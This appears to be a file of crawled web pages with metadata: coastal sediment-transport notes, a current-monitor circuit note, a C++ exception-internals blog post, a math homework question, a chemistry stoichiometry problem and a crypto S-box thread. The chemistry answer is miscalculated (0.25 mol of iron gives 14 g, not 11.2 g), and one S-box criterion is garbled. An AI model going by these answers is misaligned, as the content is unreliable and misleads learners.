7003850 from JARKUS, n.d.) using $$D_{50} = 200\\ \\mu m$$ and $$D_{90} = 300\\ \\mu m$$.\n\nThe cross-shore distribution of longshore sediment transport is, of course, strongly determined by the cross-shore distribution of the longshore current. The longshore current distribution on a barred beach for different wave conditions (Fig. 5.42) is repeated in Fig. 8.1a. Besides, Fig. 8.1 shows the longshore transport rates as calculated with the longshore sediment transport model Unibest-$$CL_+$$. Comparing the upper and middle panel of Fig. 8.1a while keeping Eqs. 8.2.1.1 and 8.2.1.3 in mind, we may conclude that most of the sediment stirring takes place in a relatively narrow zone on the seaward flanks of the breaker bars, where most of the wave-breaking takes place. Also note the non-linear dependency of the transport on the velocity. Figure 8.1b demonstrates that the outcomes of uncalibrated transport formulas may differ substantially.", null, "Figure 8.2: Comparison between calculated and measured cross-shore distribution of long-shore sediment transport rate for one run of the SandyDuck experiment (98/02/04). Adapted from Bayram et al. (2001). The letters indicate different models, with amongst them B: Bijker (Eq. 6.5.4.1), BI: Bailard-Inman (Sect. 6.7.2), VR: Van Rijn (Eq. 6.6.1.5 for suspended load plus separate bed load formula).\n\nBayram et al. (2001) analyse the cross-shore distribution of longshore sediment trans- port according to a few well-known predictive formulas and field measurements at Duck, North Carolina. Measured hydrodynamics were used as much as possible as input for the transport models. The transport models were used with standard coefficient values without further calibration. Figure 8.2 gives the result for one specific condition ($$H_{rms} = 3.18\\ m, T_p = 12.8\\ s$$) representative for a large transport on a barred sandy profile during a storm. The mean longshore current velocity in the surf zone was $$0.6\\ m/s$$. The water depth at the most offshore measurement point was 8.6 m. 
The peak in the transport rate was observed some distance shoreward of the bar crest, whereas the formulas predicted the peak to occur more seaward (i.e., close to the bar crest).

For this specific run, most formulas overpredict the sediment transport. Furthermore, the differences between the various models are rather large. The formulas used differ particularly in the way the influence of the waves has been taken into account. Besides, sensitivities to certain input parameters vary between the formulas. This could be seen from runs under different conditions, which showed a different relative behaviour of the various formulas. Differences in total transports between the various transport formulas can easily be up to a factor of ten! This illustrates the need for calibration of the formulations before results from computer computations can be used in specific coastal engineering cases. The data used for calibration should be representative for the considered site and hydrodynamic conditions. Examples of such calibration data are observed coastline changes following a certain 'event' (such as the construction of a new harbour along a coastline, or the damming of a river and the subsequent erosion of the shoreline of the river delta).

This page titled 8.2.2: Cross-shore distribution of longshore transport is shared under a CC BY-NC-SA 4.0 license and was authored, remixed, and/or curated by Judith Bosboom & Marcel J.F. Stive (TU Delft Open) via source content that was edited to the style and standards of the LibreTexts platform; a detailed edit history is available upon request.
[ null, "https://geo.libretexts.org/@api/deki/files/17277/%25E6%2588%25AA%25E5%25B1%258F2021-11-09_%25E4%25B8%258B%25E5%258D%258810.04.47.png", null, "https://geo.libretexts.org/@api/deki/files/17278/%25E6%2588%25AA%25E5%25B1%258F2021-11-09_%25E4%25B8%258B%25E5%258D%258810.07.32.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9111076,"math_prob":0.9914879,"size":2854,"snap":"2023-40-2023-50","text_gpt3_token_len":604,"char_repetition_ratio":0.14350878,"word_repetition_ratio":0.004597701,"special_character_ratio":0.2067274,"punctuation_ratio":0.117870726,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97186285,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-08T19:43:22Z\",\"WARC-Record-ID\":\"<urn:uuid:b4952862-cb3e-4185-b97c-c31c1cb9fec8>\",\"Content-Length\":\"124498\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:fe128215-c1a6-4599-9891-b62c18376445>\",\"WARC-Concurrent-To\":\"<urn:uuid:1f1ea06f-c61b-4cf5-97da-ae2ad0b84762>\",\"WARC-IP-Address\":\"3.162.103.49\",\"WARC-Target-URI\":\"https://geo.libretexts.org/Bookshelves/Oceanography/Coastal_Dynamics_(Bosboom_and_Stive)/09%3A_Longshore_transport_and_coastline_changes/9.02%3A_Longshore_transport_formulations/8.2.2%3A_Cross-shore_distribution_of_longshore_transport\",\"WARC-Payload-Digest\":\"sha1:GYSA2V6UFBIPK54AP3DUUNQTF7RKXG34\",\"WARC-Block-Digest\":\"sha1:S6GURMKSFL4OLE7GKL3XGQHLQ2E6MFZQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100769.54_warc_CC-MAIN-20231208180539-20231208210539-00021.warc.gz\"}"}
https://www.analog.com/jp/design-notes/highvoltage-programmablegain-current-monitor.html
[ "# High-Voltage, Programmable-Gain Current Monitor\n\n### 要約\n\nThis circuit monitors current flow at high voltage (48V and higher) using a standard 5V difference amplifier (MAX4198) referenced to ground. It also employs a digital potentiometer (MAX5402) for gain adjustment.\n\nA similar version of this article appeared in the June 1, 2007 issue of PET.\n\nTelcom, LDMOS, automotive, and numerous other applications require the measurement of current flow at high voltages (high-side current). Often, a circuit operating at 5V must monitor currents at 48V. Techniques using costly high-voltage difference amplifiers and other special devices can measure such currents, but the circuit of Figure 1 does it with a standard 5V difference amp, including provisions for gain adjustment.", null, "Figure 1. This circuit monitors a current at 48V, produces a maximum output voltage of approximately 5V, and includes digitally programmable gain to accommodate wide variations in the monitored current.\n\nThe difference amp (U1, MAX4198) combines gain accuracy with low-power operation, but its maximum supply voltage is only 7.5V. To overcome this limitation, the pnp transistor Q1 transforms U1's voltage output to current. Thus, Q1's current output bridges the gap between the 48V monitored current and the 5V monitor circuit. To minimize errors induced by U1's gain resistor, zener Z1 and resistor RSHUNT clamp U1's operating voltage to a nominal 3.0V. U1's maximum operating current (ICC) is 55µA, so the maximum value for RSHUNT is:\n\nRSHUNTMAX = (VINMIN - VZ1MAX)/(ICCMAX + IZ1MIN)\n= (42V - 2.7V)/(55µA + 100µA) = 249kΩ\nWhere IZ1MIN is the minimum current required for a flat zener characteristic, VINMIN is the input voltage, and VZ1MAX is the zener tolerance.\n\nFor the connections shown in Figure 1, the voltage drop across ROUT equals the drop across RSENSE. For a maximum full-scale (FS) voltage of 100mV across RSENSE, you choose ROUT to set the magnitude of the corresponding full-scale output current. This ROUT selection involves a tradeoff, however. Higher current minimizes the effect of error current induced by the voltage drop across the two 25kΩ resistors between IN+ and REF. The percentage error introduced by this effect is lower for higher output currents.\n\nOn the other hand, higher current levels can create over-voltage in U2, and they waste power. A good trade-off seems to be 350µA. Thus, ROUT = 100mV/350µA = 286Ω (287Ω is the closest standard value). At 3.0V operation, the maximum error current induced by the resistor load is 3.0V/50kΩ = 60µA, or 17%. This may seem a bit high, but a simple calibration routine can subtract most of the effects of this error, yielding a negligible effect on the calibrated result. A common pnp transistor (MMBT3906) is chosen as the level translator. Operating at 350µA and close to 45V VCE, the transistor's power dissipation is very low (< 20mW).\n\nThe 10kΩ digital potentiometer U2 (MAX5402) adjusts the current monitor's gain. U2 has a simple up/down interface and a low value of nominal end-to-end resistance (10kΩ). Worst-case variations in the initial tolerance, supply voltage, and temperature yield a maximum end-to-end resistance of 12.5kΩ. Adding a 60µA error current to the 350µA full-scale signal current selected above yields the maximum output current from Q1: 350µA + 60µA = 410µA. 
The technique presented allows use of a 5V (maximum) difference amplifier in a 48V application, and the circuit can be modified as required for lower or higher common-mode voltages. The use of Q1 to transform the signal voltage to a current allows easy gain adjustment with a digital potentiometer. The digipot shown (MAX5402) can divide the full-scale signal magnitude by factors as high as 32. Such gain adjustment is useful for automotive battery monitoring and other applications in which the monitored current varies over a wide dynamic range.

It's important to provide separate grounds for the digital potentiometer and the op amp. It is also important not to connect these grounds to earth ground. Otherwise, that connection places the digital potentiometer in parallel with the op-amp circuit, causing the resistance at VOUT (relative to ground) to vary with the voltage at VIN.
[ null, "https://www.analog.com/-/media/analog/en/landing-pages/design-notes/highvoltage-programmablegain-current-monitor/4546fig01.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86078435,"math_prob":0.959689,"size":4447,"snap":"2022-40-2023-06","text_gpt3_token_len":1091,"char_repetition_ratio":0.13234301,"word_repetition_ratio":0.0028288544,"special_character_ratio":0.2340904,"punctuation_ratio":0.10221675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.968308,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T13:25:17Z\",\"WARC-Record-ID\":\"<urn:uuid:2449a2b1-d5f5-451e-b430-8c698a9b5a7f>\",\"Content-Length\":\"53170\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:90023f95-5f2e-4253-be3d-799f8d37e788>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e1f97d9-81e9-41c9-99e6-dd1c92e2dea4>\",\"WARC-IP-Address\":\"23.221.59.96\",\"WARC-Target-URI\":\"https://www.analog.com/jp/design-notes/highvoltage-programmablegain-current-monitor.html\",\"WARC-Payload-Digest\":\"sha1:63IGEBETHOG6PPZ3W7MDOBDOCOCK66DO\",\"WARC-Block-Digest\":\"sha1:M47B5TBOKG3VWI6NKIONXAXVVD3VJRF4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499871.68_warc_CC-MAIN-20230131122916-20230131152916-00788.warc.gz\"}"}
http://seegive.blogspot.com/2012/01/c-exception-internals.html
[ "## Friday, January 27, 2012\n\n### C++ exception internals\n\nIn this post, we'll try to analyze the internals of how exception handling works in C++. Actually, I thought this should be pretty straightforward, given the simplicity of the usage of exceptions in C++. I was wrong. Quite a lot of interesting stuff happens internally, which wasn't very obvious for me at first. So, let's go find out.\n\nSo, what is the big deal with exception handling ?\n\nThere is one big deal at-least. When an exception is thrown, the exception handling mechanism has to unwind all stacks until it finds a stack which handles it. So, let's first focus on this section of exception handling: throwing an exception.\n\n1. Throwing an exception:\n\nclass A {\npublic:\nA() {}\n~A() {}\n};\n\nclass B {\npublic:\nB() {}\n~B() {}\n};\n\nclass C {\npublic:\nC() {}\n~C() {}\n};\n\nvoid function1() {\nA a;\nB b;\nC c;\n}\n\nint main() {\nfunction1();\nreturn 0;\n}\n\nfunction1() is our main function of interest here. So, let's disassemble it. Below is the assembly code for it.\n\n(gdb) disassemble function1\nDump of assembler code for function function1():\n0x080484e4 <+00>:    push   %ebp\n0x080484e5 <+01>:    mov    %esp,%ebp\n0x080484e7 <+03>:    sub    \\$0x28,%esp\n0x080484ea <+06>:    lea    -0xb(%ebp),%eax\n0x080484ed <+09>:    mov    %eax,(%esp)\n0x080484f0 <+12>:    call   0x804859c <A::A()>\n0x080484f5 <+17>:    lea    -0xa(%ebp),%eax\n0x080484f8 <+20>:    mov    %eax,(%esp)\n0x080484fb <+23>:    call   0x80485a8 <B::B()>\n0x08048500 <+28>:    lea    -0x9(%ebp),%eax\n0x08048503 <+31>:    mov    %eax,(%esp)\n0x08048506 <+34>:    call   0x80485b4 <C::C()>\n0x0804850b <+39>:    lea    -0x9(%ebp),%eax\n0x0804850e <+42>:    mov    %eax,(%esp)\n0x08048511 <+45>:    call   0x80485ba <C::~C()>\n0x08048516 <+50>:    lea    -0xa(%ebp),%eax\n0x08048519 <+53>:    mov    %eax,(%esp)\n0x0804851c <+56>:    call   0x80485ae <B::~B()>\n0x08048521 <+61>:    lea    -0xb(%ebp),%eax\n0x08048524 <+64>:    mov    %eax,(%esp)\n0x08048527 <+67>:    call   0x80485a2 <A::~A()>\n0x0804852c <+72>:    leave\n0x0804852d <+73>:    ret\nEnd of assembler dump.\n\nOkay. All is fine here. Things are pretty straight forward. Constructors for classes A, B and C are called. Their respective destructors are called in the reverse order. None of the constructors or destructors throw an exception here. So, no problems here. Note the leave and ret instructions at the end of the function. They indicate a normal function return, meaning they get executed when we encounter a return statement ( return 10; ) in C / C++.\n\nNow let's modify class \"C\" as below:\n\nclass C {\npublic:\nC() {\nthrow 1;\n}\n~C() {}\n};\n\nC::C() has changed as below. We call a couple of special functions here __cxa_allocate_exception and  __cxa_throw. We'll cover more on what these functions do later. 
For now, it's just enough to know that they're getting called when we throw an exception.\n\n(gdb) disassemble C::C()\nDump of assembler code for function C::C():\n0x0804874c <+00>:    push   %ebp\n0x0804874d <+01>:    mov    %esp,%ebp\n0x0804874f <+03>:    sub    \\$0x18,%esp\n0x08048752 <+06>:    movl   \\$0x4,(%esp)\n0x08048759 <+13>:    call   0x8048560 <__cxa_allocate_exception@plt>\n0x0804875e <+18>:    movl   \\$0x1,(%eax)\n0x08048764 <+24>:    movl   \\$0x0,0x8(%esp)\n0x0804876c <+32>:    movl   \\$0x804a040,0x4(%esp)\n0x08048774 <+40>:    mov    %eax,(%esp)\n0x08048777 <+43>:    call   0x8048570 <__cxa_throw@plt>\nEnd of assembler dump.\n\nNow, something unexpected has happened here. The code in function1() has changed too, even though we haven't touched a bit in it. Below is the updated function1().\n\n(gdb) disassemble function1\nDump of assembler code for function function1():\n0x08048654 <+00>:    push   %ebp\n0x08048655 <+01>:    mov    %esp,%ebp\n0x08048657 <+03>:    push   %ebx\n0x08048658 <+04>:    sub    \\$0x24,%esp\n0x0804865b <+07>:    lea    -0xb(%ebp),%eax\n0x0804865e <+10>:    mov    %eax,(%esp)\n0x08048661 <+13>:    call   0x8048734 <A::A()>\n0x08048666 <+18>:    lea    -0xa(%ebp),%eax\n0x08048669 <+21>:    mov    %eax,(%esp)\n0x0804866c <+24>:    call   0x8048740 <B::B()>\n0x08048671 <+29>:    lea    -0x9(%ebp),%eax\n0x08048674 <+32>:    mov    %eax,(%esp)\n0x08048677 <+35>:    call   0x804874c <C::C()>\n0x0804867c <+40>:    lea    -0x9(%ebp),%eax\n0x0804867f <+43>:    mov    %eax,(%esp)\n0x08048682 <+46>:    call   0x804877c <C::~C()>\n0x08048687 <+51>:    lea    -0xa(%ebp),%eax\n0x0804868a <+54>:    mov    %eax,(%esp)\n0x0804868d <+57>:    call   0x8048746 <B::~B()>\n0x08048692 <+62>:    lea    -0xb(%ebp),%eax\n0x08048695 <+65>:    mov    %eax,(%esp)\n0x08048698 <+68>:    call   0x804873a <A::~A()>\n0x080486a0 <+76>:    pop    %ebx\n0x080486a1 <+77>:    pop    %ebp\n0x080486a2 <+78>:    ret\n0x080486a3 <+79>:    mov    %eax,%ebx\n0x080486a5 <+81>:    lea    -0xa(%ebp),%eax\n0x080486a8 <+84>:    mov    %eax,(%esp)\n0x080486ab <+87>:    call   0x8048746 <B::~B()>\n0x080486b0 <+92>:    lea    -0xb(%ebp),%eax\n0x080486b3 <+95>:    mov    %eax,(%esp)\n0x080486b6 <+98>:    call   0x804873a <A::~A()>\n0x080486bb <+103>:    mov    %ebx,%eax\n0x080486bd <+105>:    mov    %eax,(%esp)\n0x080486c0 <+108>:    call   0x8048590 <_Unwind_Resume@plt>\n\nEnd of assembler dump.\n\nNote that there is a new section of instructions ( in bold in the original post ) added after the ret instruction. Looks like some calls to destructors have been added here. Let's analyze what this exactly means.\n\nvoid function1() {\nA a;\nB b;\nC c;\n}\n\nNow, in the above function, when C c; is read by the compiler, it sees that C's constructor throws an exception. So, it does the following in this case:\n\n1. If C::C() throws an exception at run-time, it indirectly means that objects a and b have already been constructed successfully. In that case, they SHOULD BE destroyed. So, the compiler inserts calls to B::~B() and A::~A() ( remember the reverse order ).\n\n2. Also, if C::C() throws an exception at run-time, then object c is not considered to be fully constructed. In that case, it need not be destructed, meaning C::~C() need not be called. So, the compiler doesn't bother about C::~C(). Hence, no calls to C::~C() in the above new code.\n\n3. Since we are in red alert, we need to convey this to the caller of function1() ( which is main() here ) too. 
So, the compiler calls the _Unwind_Resume function to continue the same steps in the parent function. Note that _Unwind_Resume is perfectly placed at the end of the function, so a sequential execution will pick it up, which means we're not going by the normal leave / ret code path here. We're using a secondary code path.\n\nThis is the secret behind how compilers propagate exceptions and unwind stacks. The compiler analyzes the code while compiling, and adds extra code to handle exceptions. This means extra work and extra compile time. This also implies that your library / executable might get a little bigger than normal.\n\nOkay, we covered the simple case of class C throwing an exception. Let's deal with a little more complex case. What happens when the constructors of A, B and C could all possibly throw an exception ? This means that all 3 of them have code which could trigger an exception at run-time. We won't know until run-time who will throw one. The compiler has to generate code in function1() to accommodate all the cases. The expected behavior is listed below:\n\n1. At run-time, if A's constructor throws an exception, then we should just exit the stack frame, without calling any destructor.\n\n2. If B's constructor throws an exception, then we should only call A's destructor.\n\n3. If C's constructor throws an exception, then we should call the destructors of both A and B.\n\nBelow is the assembly code generated when all 3 constructors throw an exception. The initial section of function1() has been trimmed off, since it's the same here too.\n\n(gdb) disassemble function1\nDump of assembler code for function function1():\n...\n\n...\n0x080486a0 <+76>:    pop    %ebx\n0x080486a1 <+77>:    pop    %ebp\n0x080486a2 <+78>:    ret\n0x080486a3 <+79>:    mov    %eax,%ebx\n0x080486a5 <+81>:    lea    -0xa(%ebp),%eax\n0x080486a8 <+84>:    mov    %eax,(%esp)\n0x080486ab <+87>:    call   0x804879e <B::~B()>\n0x080486b0 <+92>:    jmp    0x80486b4 <function1()+96>\n0x080486b2 <+94>:    mov    %eax,%ebx\n0x080486b4 <+96>:    lea    -0xb(%ebp),%eax\n0x080486b7 <+99>:    mov    %eax,(%esp)\n0x080486ba <+102>:    call   0x8048768 <A::~A()>\n0x080486bf <+107>:    mov    %ebx,%eax\n0x080486c1 <+109>:    mov    %eax,(%esp)\n0x080486c4 <+112>:    call   0x8048590 <_Unwind_Resume@plt>\nEnd of assembler dump.\n\nIf we look into the code above, we can easily sort out the answers by plain reasoning. E.g. to solve (1), jump directly from A's constructor to address 0x080486bf ( so that we don't fall in the line of the calls to B::~B() and A::~A() ). For (2), jump directly from B's constructor to address 0x080486b0 ( so that we fall in the line of the call to A::~A() and not B::~B() ). For (3), jump directly from C's constructor to address 0x080486a3 ( so that we fall in the line of the calls to A::~A() and B::~B() ).\n\nOne might quickly guess that these addresses can be hard-coded in the constructors to close this whole issue. But this won't work, since these objects ( and their constructors ) might be used in a lot of places, not only in function1(). So, it becomes obvious that this mechanism of finding the address to jump to should be dynamic. And the code for doing that should be in one of __cxa_allocate_exception or __cxa_throw, since they are the ones being called once an exception is thrown. Decent guess. So, let's explore what each one of them does a bit.\n\nTill now, we've not answered one question. When we do a 'throw someObject;' how is someObject accessible in a different stack frame ? 
The stack where the exception originated is already gone .. right ?\n\nCorrect. The exception is not allocated in the stack. It is allocated in the freestore. __cxa_allocate_exception is the guy responsible for allocating it. How can you verify it ? Simple. Let's modify the exception thrown by A's constructor a bit. Rather than doing a \"throw 1\", we'll throw an object which has a big size, and see where it gets allocated.\n\nclass Memory {\nprivate:\nint a_[ 1024 * 1024 ];\npublic:\nMemory() {\na_[ 1024 ] = 0xaaaabbbb;\n}\n};\n\nclass A {\npublic:\nA() {\nthrow Memory();\n}\n~A() {\n}\n};\n\nHere, we've created a class Memory, whose size is 4 Mbytes ( sizeof(int) * 1024 * 1024 ). Now, let's analyze the constructor of A() to see where it allocates this object.\n\nDump of assembler code for function A::A():\n0x0804878a <+00>:    push   %ebp\n0x0804878b <+01>:    mov    %esp,%ebp\n0x0804878d <+03>:    push   %ebx\n0x0804878e <+04>:    sub    \\$0x14,%esp\n0x08048791 <+07>:    movl   \\$0x400000,(%esp)\n0x08048798 <+14>:    call   0x80485a0 <__cxa_allocate_exception@plt>\n0x0804879d <+19>:    mov    %eax,%ebx\n0x0804879f <+21>:    mov    %ebx,(%esp)\n0x080487a2 <+24>:    call   0x8048778 <Memory::Memory()>\n0x080487a7 <+29>:    movl   \\$0x0,0x8(%esp)\n0x080487af <+37>:    movl   \\$0x8048918,0x4(%esp)\n0x080487b7 <+45>:    mov    %ebx,(%esp)\n0x080487ba <+48>:    call   0x80485b0 <__cxa_throw@plt>\nEnd of assembler dump.\n\nIf the exception Memory() was allocated in the stack, the value of %esp would have been decremented by approximately 4 Mbytes. It's not. %esp is just decremented by \\$0x14 ( 20 bytes ). So, the Memory() object was not allocated in the stack. If we move our focus to the line in bold, things should be obvious. A value of 4 Mbytes is passed as an argument to the __cxa_allocate_exception function. So, it's this function that allocates the exception dynamically, as the name suggests. Still not convinced? Try a simple trick. Break in __cxa_allocate_exception in gdb. Analyze the memory usage of the program ( pmap -x <pid> ). Run the 'finish' command in gdb to complete the execution of __cxa_allocate_exception. Now analyze the memory. It should have increased by 4 Mbytes.\n\nSo, __cxa_allocate_exception is responsible for allocation. It returns the allocated address ( in %eax, the return value register ), where the Memory() object is constructed. After this, we call __cxa_throw. 0x8(%esp) is the 3rd argument. 0x4(%esp) is the 2nd argument. (%esp) is the 1st argument. In short, we call\n\n__cxa_throw( Memory()'s this pointer, Memory()'s typeinfo, 0 )\n\nSo, by elimination, if __cxa_allocate_exception only takes care of exception memory allocation, then __cxa_throw is the guy who knows the jumping logic. This is the function where all the trickery should happen, logically. This function knows where exactly to land in the previous stack call frame ( function1() in our case ), so that it will avoid calling the wrong destructors. At this point, I too am not clear on how it does this. I will defer it for now.\n\n2. Catching an exception:\n\nCatching is pretty trivial. Whenever we catch an exception, we either have the choice to end the misery, or to propagate ( aka re-throw ) it with a smile on the face. If you're propagating, then refer to the previous section. If you've handled the exception, go to sleep ;-)" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7629542,"math_prob":0.8728287,"size":22926,"snap":"2019-51-2020-05","text_gpt3_token_len":7221,"char_repetition_ratio":0.19732136,"word_repetition_ratio":0.88941634,"special_character_ratio":0.39740905,"punctuation_ratio":0.19796404,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.965452,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T05:46:03Z\",\"WARC-Record-ID\":\"<urn:uuid:4fd555b3-01b8-4b9e-957e-31deaea81fd2>\",\"Content-Length\":\"92468\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6d68d5ed-cb75-4f4d-ac19-3e3bb8677960>\",\"WARC-Concurrent-To\":\"<urn:uuid:63717d7d-65ac-47fb-ab71-333655438260>\",\"WARC-IP-Address\":\"172.217.164.161\",\"WARC-Target-URI\":\"http://seegive.blogspot.com/2012/01/c-exception-internals.html\",\"WARC-Payload-Digest\":\"sha1:RVG46BQ4FJRQ44RDHMAB3VPDCF24PJOW\",\"WARC-Block-Digest\":\"sha1:EKJMJP5UIK7SWKRAR7DDZBCI5NRD55XO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540584491.89_warc_CC-MAIN-20191214042241-20191214070241-00118.warc.gz\"}"}
https://web2.0calc.com/questions/i-need-to-create-an-exponential-growth-decay-model
[ "+0\n\n# I need to create an exponential growth/decay model using the simplified form of y=ab^x for the given problem.\n\n0\n99\n1\n\nTwo bacteria are discovered at the bottom of a shoe. If the bacteria multiply at a rate of 34% per hour, how many bacteria will be present after 48 hours?\n\n-The percentage needs to be converted into a decimal and then put into the equation.\n\nDec 4, 2018\nedited by Guest  Dec 4, 2018" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9129309,"math_prob":0.94389254,"size":324,"snap":"2019-26-2019-30","text_gpt3_token_len":93,"char_repetition_ratio":0.15,"word_repetition_ratio":0.0,"special_character_ratio":0.33333334,"punctuation_ratio":0.12987013,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98184264,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-21T17:55:40Z\",\"WARC-Record-ID\":\"<urn:uuid:f300d890-7c36-46e3-9a88-be3559c44b0c>\",\"Content-Length\":\"21887\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7976fc21-c492-4044-b9e3-4a10a11c020b>\",\"WARC-Concurrent-To\":\"<urn:uuid:9a8464e5-dd56-481f-808c-e1e7e92a64ed>\",\"WARC-IP-Address\":\"144.76.186.3\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/i-need-to-create-an-exponential-growth-decay-model\",\"WARC-Payload-Digest\":\"sha1:LLMVLRVZ5GY5H5PIJ2SFYKQNOXINM7EH\",\"WARC-Block-Digest\":\"sha1:FCM5PZH6UUC6U4CWD34GR3XDJHELSRAR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195527089.77_warc_CC-MAIN-20190721164644-20190721190644-00079.warc.gz\"}"}
https://www.univerkov.com/calculate-the-mass-of-iron-that-is-formed-by-the-interaction-of-20-g-of-iron-iii-oxide-with-50-g-of-aluminum/
[ "# Calculate the mass of iron that is formed by the interaction of 20 g of iron (III) oxide with 50 g of aluminum.\n\nGiven:\n\nm (Fe2O3) = 20 g\n\nm (Al) = 50 g\n\nFind:\n\nm (Fe) -?\n\nSolution:\n\n1) We compose the reaction equation corresponding to the condition of the problem:\n\nFe2O3 + 2Al = 2Fe + Al2O3;\n\n2) Find the amount of iron oxide and aluminum:\n\nn (Fe2O3) = m: M = 20 g: 160 g / mol = 0.125 mol\n\nn (Al) = m: M = 50 g: 27 g / mol = 1.85 mol\n\nWe carry out calculations, substituting a smaller value in order to get more accurate calculations. We work with Fe2O3:\n\n3) We compose a logical expression:\n\nif 1 mol of Fe2O3 gives 2 mol of Fe in the reaction,\n\nthen 0.125 mol of Fe2O3 will give a mol of Fe in the reaction x,\n\nthen x = 0.25 mol.\n\n4) Find the mass of iron released during the reaction:\n\nm (Fe) = n * M = 0.25 mol * 56 g / mol = 11.2 g;\n\nAnswer: m (Fe) = 11.2 grams.", null, "One of the components of a person's success in our time is receiving modern high-quality education, mastering the knowledge, skills and abilities necessary for life in society. A person today needs to study almost all his life, mastering everything new and new, acquiring the necessary professional qualities." ]
[ null, "https://www.univerkov.com/01.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.858976,"math_prob":0.9971964,"size":1193,"snap":"2023-40-2023-50","text_gpt3_token_len":359,"char_repetition_ratio":0.114381835,"word_repetition_ratio":0.008438818,"special_character_ratio":0.32942164,"punctuation_ratio":0.14068441,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9849041,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-03T20:14:32Z\",\"WARC-Record-ID\":\"<urn:uuid:05616c8a-257f-4fef-823f-468b6e0882d8>\",\"Content-Length\":\"25614\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8323eafa-1584-4e59-a551-09bb5148e0a1>\",\"WARC-Concurrent-To\":\"<urn:uuid:8a067fb8-3c61-44ee-95d5-f74f76143176>\",\"WARC-IP-Address\":\"37.143.13.208\",\"WARC-Target-URI\":\"https://www.univerkov.com/calculate-the-mass-of-iron-that-is-formed-by-the-interaction-of-20-g-of-iron-iii-oxide-with-50-g-of-aluminum/\",\"WARC-Payload-Digest\":\"sha1:EAWRICZ4YQJ37NJF5K5JV3XQKFGXSJK3\",\"WARC-Block-Digest\":\"sha1:7TUOIKOX2AVSXZIYVWGP3SUAV3WN6LGQ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233511220.71_warc_CC-MAIN-20231003192425-20231003222425-00433.warc.gz\"}"}
https://crypto.stackexchange.com/questions/1297/desirable-s-box-properties?noredirect=1
[ "# Desirable S-box properties\n\nWhat desirable properties should an S-box have?\n\nMy current standard selection process is to just pick them at random and verify that they fit the following criteria:\n\n• The probability that any random two bits $S[a]_b$ and $S[c]_d$ are equal (for any random $a$, $b$, $c$ and $d$) is 50%.\n• The probability that any random two bits $S[a]_n$ and $a_n$ are equal (for any random $a$ and $n$) is 50%.\n• No entries exist such that $S[a] = a$\n• No entries exist such that $S[a] = \\bar{a}$\n\nAre there any other important properties that need to be applied?\n\nEdit My reasons for asking are that I wish to combine this S-Box design with a CBC mode cipher as discussed on this question.\n\n• My rational is that S[a] = a provides no benefit and S[a] = !a will always maintain the same bit \"pattern\" as its input. Since the idea of an S-box is to provide \"confusion\" (as defined by Shannon), it seems reasonable to ensure that neither of these cases are allowed. I may, however, be incorrect. – Polynomial Nov 23 '11 at 14:41\n• The output of the cipher has the avalanche property and appears random, but the construction of the S-box is not random. It's a case of not allowing any correlation, rather than specifying that a particular output is not allowed. – Polynomial Nov 23 '11 at 14:52\n• this seems to be a good paper about s-box: sans.org/reading_room/whitepapers/vpns/… – woliveirajr Nov 23 '11 at 15:00\n• It doesn't really explain why they made the choices they did, though. It just says \"this is the S-box and these are the choices we made\". I'm really looking for answers that provide both an explanation of the facts and the reasoning behind making the choices. – Polynomial Nov 23 '11 at 15:05\n• – woliveirajr Nov 23 '11 at 15:20\n\nThe following information about the DES S-Box might be useful (taken from here):\n\nDES Design Criteria\n\n• there were 12 criterion used, resulting in about 1000 possible S-Boxes, of which the implementers chose 8\n\n• these criteria are CLASSIFIED SECRET\n\n• however, some of them have become known\n\nThe following are design criterion:\n\nR1: Each row of an S-box is a permutation of 0 to 15\n\nR2: No S-Box is a linear of affine function of the input\n\nR3: Changing one input bit to an S-box results in changing at least two output bits\n\nR4: S(x) and S(x+001100) must differ in at least 2 bits\n\nThe following are said to be caused by design criteria\n\nR5: S(x) [[pi]] S(x+11ef 00) for any choice of e and 